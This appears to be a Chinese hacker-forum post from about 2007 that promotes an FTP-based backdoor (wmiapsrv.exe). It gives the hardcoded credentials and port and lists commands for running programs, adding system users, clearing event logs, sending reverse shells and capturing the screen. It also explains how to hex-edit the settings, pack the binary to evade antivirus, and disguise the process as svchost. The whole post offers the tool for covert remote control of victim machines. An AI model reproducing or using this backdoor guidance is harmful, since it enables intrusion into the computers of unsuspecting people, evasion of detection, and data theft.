SUS迷你ftp后门

文章作者:单克隆抗体
信息来源:邪恶八进制信息安全团队(www.eviloctal.com)

注意:文章首发东南大学网络安全联盟论坛(www.bestseu.com/sus/),后由作者友情提交到邪恶八进制信息安全团队技术论坛,转载请注明首发站点。

这个后门的思路绝对新颖,将后门融入小巧的ftp服务器中.既能进行快速大量可靠的ftp传文件,又不失后门强大的控制功能.既保持苗条的身材,又具备良好的隐身术和超强的稳定性.本后门完全无需使用特定的客户端程序,任何时间,任何地点,想怎么控制,就怎么玩。再加上它原创免杀的特性.怎么样,跃跃欲试了吧?

这次发布的是测试版,压缩包内共一个文件wmiapsrv.exe。测试方法:将其解压到一个不含空格的目录里,如c:\windows\system32.运行即可。这样服务端便成功安装并运行了。

只需用任一款ftp连接工具(包括windows自带的ftp和IE),ip地址填服务端ip,端口填2100,用户名填sus,密码填sus666,确定后服务端的c:盘便立刻展现在眼前。

再看看其它的控制功能怎么实现的呢?
这里提供2种方法:

1.
telnet <服务端ip> 2100
输入user sus
pass sus666
待它显示Logged on后,便可以输入后门控制命令,如pslist。

2.
运行ftp.exe,然后输入open <服务端ip> 2100,按照提示输入用户名sus,密码sus666便登陆进去了。除了运行传统的ftp命令外,这里还可以用quote加上马上要提到的后门控制命令,如quote pslist。

专用的后门控制命令如下,这些在你输入help的时候显示出来。
######################################################################
Thank you for using the SUS's FTP BackDoor! Welcome to SUS!
Author: dklkt Date: 2007.7
######################################################################

WINEXEC <exefilepath> Using this to execute an executable file.
SHELLEXECUTE <exefilepath> The same to above.
SETHOMEDIR <ftp's homedir> Set the home directory of ftp's. Default is C:\
GETSYSINFO Get some system infomation
PSLIST List the Process on the system
PSKILL <PID> Kill a process by its pid
VIEWTERMPORT View Terminal Service's port. Default is 3389
SETTERMPORT <PortNum> Set the Terminal Service's Port.
INSTALLTERM Install Terminal Service.
CLEANEVENT Clean the system event logs.
ENUMSERVICE List all the services in the system.
STARTSERVICE <ServcieName> Start a service. Like "net start"
STOPSERVICE <ServiceName> Stop a service.
DELETESERVICE <ServiceName> Delete a service.
VIEWSERVICE <ServiceName> View the detail of a service.
CONFIGSERVICE <ServiceName> <Type> Change service type(Auto,Demand,Disable)
REBOOT Reboot the system.
SHUTDOWN Power off the system.
STOPBACKDOOR Stop the Ftp Backdoor without uninstall it.
SENDBACKSHELL <ip> <port> Send a back cmdshell. Use nc listen first
STARTSHELL <port> Start a cmdshell and listen. You can telnet it.
CATCHSCREEN <bmpfilepath> Catch the screen now and save it to a bmp file.
HTTPDOWNLOAD <filepath> <httpaddress> Download a file using http protocol.
UNINSTALL Uninstall the Ftp Backdoor!
————————————————-
Good Luck! :-)

(本人英语比较搓,大家意会便可,语法问题多多 ^_^)

比如你在telnet模式下,想运行c:\mm.exe这个程序,便输入
winexec c:\mm.exe

在ftp模式下,想添加一个系统用户,可以输入
quote shellexecute net.exe user aaa /add

在telnet模式下,想修改ftp服务的home目录位置到d:盘,可以输入
sethomedir d:\

相应的的,ftp模式下,前面加上quote
quote sethomedir d:\

另外,虽然这是测试版,但特意没有加壳。你也可以根据需要手动修改用户名和密码。只需用UltraEdit等工具查找sus666等字符串修改即可。端口也是可以修改的,2100对应的16进制是834,因为是反序的,所以你查找34 08这两个字节就可以了,大约是在第a230那一行,改成相应的就行。比如想改成21,就把它改成15 00。希望大家自己用用就好,没必要对外传播。还有最好自己加个壳再拿去做后门。

差点忘了。把特性说明下:
本后门是替换系统服务自启动的,启动后伪装成svchost进程(相似程度100%)穿透防火墙。估计一般的辅助工具不容易查出来,这里你可以使用stopbackdoor命令停止后门,用uninstall命令卸载后门。

下载地址:[email protected]

相关日志

发表评论